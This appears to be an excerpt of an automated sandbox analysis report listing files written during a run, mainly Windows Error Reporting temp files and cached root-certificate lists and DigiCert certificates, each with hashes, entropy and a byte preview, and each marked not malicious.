                                                                                                                                                                                                                                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.6.0.8.<./.P.i.

                                                                                                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERBED.tmp.xml

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):4593
                                                                                                                                                                                                                                                        Entropy (8bit):4.472645300650811
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:48:cvIwWl8zsiNJg77aI9svWpW8VYtYm8M4JdLFg+q8N5aM7V3d:uIjfinI7i+7VhJ8qz7V3d
                                                                                                                                                                                                                                                        MD5:B860CE4C5764F9E8C092FCE4D0458F11
                                                                                                                                                                                                                                                        SHA1:53BCB2B77CF3352E9D5DCDA2A20A75AA1C4982AD
                                                                                                                                                                                                                                                        SHA-256:6F9F1B91DEF8CAED54190CFE0320FFFDC3504C036857D4ED2952E8FCA1610D24
                                                                                                                                                                                                                                                        SHA-512:81E5D1500BE67B8FB08C2E42638C8BF29CA06A89C67A14D3C76DB81BAE3299BD05790379C8E2C0E6B50D0E57612194E3BCDB109EBF5109C2DC1937EDD8A7B1A1
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="559230" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERBFB.tmp.csv

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):84112
                                                                                                                                                                                                                                                        Entropy (8bit):3.0966545243187964
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:1536:4f8pJsASvPMzJmjf6vkhb2HO2GM8xWMjE6H9QnD0G:4f8pJsASvPMzJmjf6vkhb2HO2GM8x7jC
                                                                                                                                                                                                                                                        MD5:A4CD2DA063792054CFC4038B176BEF46
                                                                                                                                                                                                                                                        SHA1:82952B89EBEE94F5488849F5D9FAD2B4629DF03F
                                                                                                                                                                                                                                                        SHA-256:98C3082DFC8AF1B717D8966110EAAA6E887A8AC23C34E5D10375B7FD9B661285
                                                                                                                                                                                                                                                        SHA-512:21D99E0493E64B18DFE9146D575533220E1655ADE6FF091F5F44156AD7DB1607F4A84EA4FAFC3AEBC014D620369231FBEFBC4E196D92AE2507B3F259DB84A3A7
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

                                                                                                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERC4A.tmp.txt

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):13340
                                                                                                                                                                                                                                                        Entropy (8bit):2.6856159031438334
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:96:TiZYWU1valfYQYVW4HhYEZGNPtMi1uYSTwG3Kea37Zu4MySoSIQd+3:2ZDUyXPc6eaLZu4MySo1Qs3
                                                                                                                                                                                                                                                        MD5:ED9C914934D255E29F14904C011E095B
                                                                                                                                                                                                                                                        SHA1:C3B65E9AB0CE06D1D0D9153D74B77C3950514275
                                                                                                                                                                                                                                                        SHA-256:6A5DCCC2000D86C5E399186E88F83F6F12F986CE0353031BA7C4A2158CEEA508
                                                                                                                                                                                                                                                        SHA-512:3D5B6421AB88DEF776E9B21B0E69224BD43361AE81986FB7EF6B37CFEA1C4F0D95D48BCC1241820ADACD1F7CADFDF1D2519317483D9384E6A08B38D5CE2D59E2
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

                                                                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                        File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 4770 bytes, 1 file, at 0x2c +A "disallowedcert.stl", number 1, 1 datablock, 0x1 compression
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):4770
                                                                                                                                                                                                                                                        Entropy (8bit):7.946747821604857
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:96:9/nBu64pydcvOHRUfu0xK1bQYMRSRNoYmxYvk56sHMZhh4m:9/nBuP2cGxUfu6K1bpWJ6vfh4m
                                                                                                                                                                                                                                                        MD5:1BFE591A4FE3D91B03CDF26EAACD8F89
                                                                                                                                                                                                                                                        SHA1:719C37C320F518AC168C86723724891950911CEA
                                                                                                                                                                                                                                                        SHA-256:9CF94355051BF0F4A45724CA20D1CC02F76371B963AB7D1E38BD8997737B13D8
                                                                                                                                                                                                                                                        SHA-512:02F88DA4B610678C31664609BCFA9D61DB8D0B0617649981AF948F670F41A6207B4EC19FECCE7385A24E0C609CBBF3F2B79A8ACAF09A03C2C432CC4DCE75E9DB
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:MSCF............,...................O.................2Wqh .disallowedcert.stl....^K...CK.wTS...:.w.K'.C0T.....Bh.{....C.).*.....Y@...(..).R."E..D^6........u....|f~3...o.3. ..SPK.k.o#...."{-.U..P........:..aPr.@.d......Dy.h.....)..:...!./\A.....A<I_<$...q.h..........'.....7....H...@`T..K.S.%...Y4..R.....`.....-....D...(..b..-c."...G.=.dx..S+..2.a.E....d.L...77J...c.[..@..iT&..^78..g....NW6.Ek..FY.F........cNt.O.*..R....*......D...... k........J.y...z.d...;.9_t...].@....yw..}.x....d.t..`f\K..;|.*h.X...4/.;.xT......q>.0...<...3...X..L$.&.,b.....\V....\......G..O..@..H3.....t..J..).x.?.{[..G>.7...<...^Q..z..Gw9P..d....i].n%K}.*z..2.Py...A..s...z..@...4..........4.....*Y.d..._Z.5.s..fl.C..#.K{9^.E...k..z.Ma..G.(.....5g. ...}.t.#4....$;.,....S@fs....k......u .^2.#_...I........;.......w..P...UCY...$;.S._|.x..dK...[i..q..^.l..A.?.....'N.. .L.l......m.*.+f#]............A.;.....Z..rIt....RW....Kr1e=8.=.z:Oi.z.d..r..C_......o...]j.N;.s....3@3.dgrv.

                                                                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):71954
                                                                                                                                                                                                                                                        Entropy (8bit):7.996617769952133
                                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                                        SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                                                                                                                                                                                                        MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                                                                                                                                                                                                        SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                                                                                                                                                                                                        SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                                                                                                                                                                                                        SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

                                                                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C56C4404C4DEF0DC88E5FCD9F09CB2F1

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:Certificate, Version=3
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1716
                                                                                                                                                                                                                                                        Entropy (8bit):7.596259519827648
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:48:GL3d+gG48zmf8grQcPJ27AcYG7i47V28Tl4JZG0FWk8ZHJ:GTd0PmfrrQG28cYG28CEJ
                                                                                                                                                                                                                                                        MD5:D91299E84355CD8D5A86795A0118B6E9
                                                                                                                                                                                                                                                        SHA1:7B0F360B775F76C94A12CA48445AA2D2A875701C
                                                                                                                                                                                                                                                        SHA-256:46011EDE1C147EB2BC731A539B7C047B7EE93E48B9D3C3BA710CE132BBDFAC6B
                                                                                                                                                                                                                                                        SHA-512:6D11D03F2DF2D931FAC9F47CEDA70D81D51A9116C1EF362D67B7874F91BF20915006F7AF8ECEBAEA59D2DC144536B25EA091CC33C04C9A3808EEFDC69C90E816
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:0...0............@.`.L.^.....0...*.H........0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40...210429000000Z..360428235959Z0i1.0...U....US1.0...U....DigiCert, Inc.1A0?..U...8DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA10.."0...*.H.............0........./B.(.x.].9Y...B.3..=..p..&0...h.\..4$..KO.xC........g.RO..W.......>Mp$d....}4}L.W.kC....;....GZ..L.. %............e....I5.=Q..!xE...,.......IpB2......eh..ML..HRh....W]...e...O.,H.V.5........7.....|...2........t..9..`.....1.......#GG...n..m.....jg-.D......;...2Z..j`T.I....\.o.&....8........o.a4\..E(.6*f(_.s.&%....\...L.b.^3........+..6y.....u.e..HP.w....P.F.aX..|..<.(.9....S..G.u0..0.v..[K]taM?..v.X.r.)A...m&vh.A.X..&+..MY.x.J>@G_.Ps..#!Y`.dT..!..8.|f..x8E0.O.cOL....SA|X=G....2...l<.V.........Y0..U0...U.......0.......0...U......h7..;._....a{..e.NB0...U.#..0.......q]dL..g?....O0...U...........0...U.%..0...+.......0w..+........k0i0$..+.....0...http:/

                                                                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):727
                                                                                                                                                                                                                                                        Entropy (8bit):7.563840806637443
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:12:5onfZPc5RlRtBfQRKsS3GO1OfBJWPggSMcJD0Khky41hrQOSFxvF0nBwUU2wZ:5iFcdZ6KP3YHHMcJyyO9QOSunaT2wZ
                                                                                                                                                                                                                                                        MD5:23D2A40D03B92FF977A4F7F3F5B7B3D6
                                                                                                                                                                                                                                                        SHA1:DFAF45BE65A508FED92543473C235FB9E56EC900
                                                                                                                                                                                                                                                        SHA-256:42931FA0CF548D85BAB78A132B91B75AF2E8C94891568C976BE1C9B48D3ECAB1
                                                                                                                                                                                                                                                        SHA-512:2383D3513513D6D929FD1B7D780D152B3D8240EC013DEF216C6BAB6127B3C4BC523770A1BD388A84100C0672E68B6C46E62DDAAD78BB641E084C6F43690C1966
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:0..........0.....+.....0......0...0..........q]dL..g?....O..20241023184215Z0s0q0I0...+........."..;F..=\@ua..........q]dL..g?....O....@.`.L.^........20241023184215Z....20241030184215Z0...*.H.............$...Q...}oW..X.].2......2d....mOE.x.. sB1p..4..z,A.D7...[...E..JPH.M.&....).q.........V.h.c.............:......T{.....q.`..Z.u.(..b.K..=.ev..F.....inf.T.6$.R.L3E.....Aq.......4'<....S.F|[}}#T.....N.N6.6#Wmu.j..m.d....G...S.{).Pk.....e..{iFO..Q>.&..lG`...,.b.?..Kh4b..q...@'.H.:.{...L.X.ZT...2.gf.!?:...G...*.Z}.$p.f.....}.N.. ...2T...M....8..3..NJj...Z.h.............[..Z.q.<.G(F..j.....'..&.....:..(.Y..s...5A..7....!....4.N..,..O..oU2..5..g...CX.....SZ..A..@=u.0B.gJ......L;..(.9

                                                                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2E248BEDDBB2D85122423C41028BFD4

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:Certificate, Version=3
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1428
                                                                                                                                                                                                                                                        Entropy (8bit):7.688784034406474
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:nIGWnSIGWnSGc9VIyy0KuiUQ+7n0TCDZJCCAyuIqwmCFUZnPQ1LSdT:nIL7LJSRQ+QgAyuxwfynPQmR
                                                                                                                                                                                                                                                        MD5:78F2FCAA601F2FB4EBC937BA532E7549
                                                                                                                                                                                                                                                        SHA1:DDFB16CD4931C973A2037D3FC83A4D7D775D05E4
                                                                                                                                                                                                                                                        SHA-256:552F7BDCF1A7AF9E6CE672017F4F12ABF77240C78E761AC203D1D9D20AC89988
                                                                                                                                                                                                                                                        SHA-512:BCAD73A7A5AFB7120549DD54BA1F15C551AE24C7181F008392065D1ED006E6FA4FA5A60538D52461B15A12F5292049E929CFFDE15CC400DEC9CDFCA0B36A68DD
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:0...0..x..........W..!2.9...wu\0...*.H........0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40...130801120000Z..380115120000Z0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40.."0...*.H.............0..........sh..]J<0"0i3..%..!=..Y..).=X.v..{....0....8..V.m...y....._..<R.R....~...W.YUr.h.p..u.js2...D.......t;mq.-... .. .c)-..^N..!a.4...^.[......4@_.zf.w.H.fWW.TX..+.O.0.V..{]..O^.5.1..^......@.y.x...j.8.....7...}...>..p.U.A2...s*n..|!L....u]xf.:1D.3@...ZI...g.'..O9..X..$\F.d..i.v.v=Y]Bv...izH....f.t..K...c....:.=...E%...D.+~....am.3...K...}....!........p,A`..c.D..vb~.....d.3....C....w.....!..T)%.l..RQGt.&..Au.z._.?..A..[..P.1..r."..|Lu?c.!_. Qko....O..E_. ........~.&...i/..-............B0@0...U.......0....0...U...........0...U..........q]dL..g?....O0...*.H..............a.}.l.........dh.V.w.p...J...x\.._...)V.6I]Dc...f.#.=y.mk.T..<.C@..P.R..;...ik.

                                                                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                                        Size (bytes):338
                                                                                                                                                                                                                                                        Entropy (8bit):3.5502094615357818
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:kKzlK8KC+3JmsN+SkQlPlEGYRMY9z+s3Ql2DUevat:rQe+kTkPlE99SCQl2DUevat
                                                                                                                                                                                                                                                        MD5:5DE7D9D265C42D055E0B87D627BE00FF
                                                                                                                                                                                                                                                        SHA1:7A81B522DBE597F92968A337F3474C40DA5B6022
                                                                                                                                                                                                                                                        SHA-256:B35BDB9AD4C564F4C9ADC62BBCFCE6AA0564F3F3F96F8D837F6D1A2368BB05AD
                                                                                                                                                                                                                                                        SHA-512:D06593ED9D6B4220B2E8D4D4B067E7E9841678C36D6B07FFB47863F6DCED3C3E237F393376882C6AE25BB58BBA6FAF49F0D07BF602C84B593AC00C2496EBA579
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:p...... ........r..(..(.................................................B.'.. .........p.........$.....(=........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.d.i.s.a.l.l.o.w.e.d.c.e.r.t.s.t.l...c.a.b...".7.4.6.7.8.7.a.3.f.0.d.9.1.:.0."...

                                                                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):328
                                                                                                                                                                                                                                                        Entropy (8bit):3.253995428229511
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:kKrtL9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:BiDImsLNkPlE99SNxAhUe/3
                                                                                                                                                                                                                                                        MD5:AE7E342D500CBD236BDA3FA905CA67BA
                                                                                                                                                                                                                                                        SHA1:926D905418105DDFFF418CAE068BFA7183E109ED
                                                                                                                                                                                                                                                        SHA-256:AB7A7B6F6EA2071250993B32592ED99A5BF7BFF873E3078BFE8AEAF3F44D11A1
                                                                                                                                                                                                                                                        SHA-512:7E03946675825C98441250BA804868E06E6539445374EC28692739FF6FDDE7F9B438423B38AA404238B11226A69C380BB4F96918FF4C4C6192F6C4E61AAB45C0
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:p...... ..........U.^'..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

                                                                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C56C4404C4DEF0DC88E5FCD9F09CB2F1

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):308
                                                                                                                                                                                                                                                        Entropy (8bit):3.1990258837803287
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:kK0GPfzNcalgRAOAUSW0P3PeXJUwh8lmi3Y:sGPqtWOxSW0P3PeXJUZY
                                                                                                                                                                                                                                                        MD5:F6FC2089376612B277D3683203320E9E
                                                                                                                                                                                                                                                        SHA1:F1AC64EE6736613855E61082894D6418AE6D1452
                                                                                                                                                                                                                                                        SHA-256:C7E096C70CAC9D92F9BE2F32F8E95FDD5A2D74A9DB6DE07FD77706F30C4CA481
                                                                                                                                                                                                                                                        SHA-512:84A530AF1904EED9007EC5DD83D425C8F3F8BED626A3AB476E600DD2EC15E82F74BED20BC76CEE6178A27ECBC4506CAEFAD69C2E817E7E1E77E500864FB0E368
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:p...... ..........-.t'..(....................................................... ........}.-@@......................h.t.t.p.:././.c.a.c.e.r.t.s...d.i.g.i.c.e.r.t...c.o.m./.D.i.g.i.C.e.r.t.T.r.u.s.t.e.d.G.4.C.o.d.e.S.i.g.n.i.n.g.R.S.A.4.0.9.6.S.H.A.3.8.4.2.0.2.1.C.A.1...c.r.t...".6.0.9.0.3.0.2.2.-.6.b.4."...

                                                                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):412
                                                                                                                                                                                                                                                        Entropy (8bit):3.9837744678058535
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:kKEbetlIls4qfOAUMivhClroFfJSUm2SQwItJqB3UgPSgakZdPolRMnOlAkrn:sRqmxMiv8sFBSfamB3rbFURMOlAkr
                                                                                                                                                                                                                                                        MD5:D10E078BDB08F77B37DAF16CD066B282
                                                                                                                                                                                                                                                        SHA1:7011112F25803FE0CD6B082FDE9055B8654A0988
                                                                                                                                                                                                                                                        SHA-256:73E4A42A0A8369F2EB69DDC5B4896891D940AA42B85AB0818EFB7D8000146FBB
                                                                                                                                                                                                                                                        SHA-512:8CF0CD5BDED59473575ABAB3D1A6354D5A1C2D9789B6C951F6AAA1A2188D79B55614D180EC23D1491140908B3D68C51E85DBFAD2E8C951F8F6EECDE65DBEC45C
                                                                                                                                                                                                                                                        Malicious:false
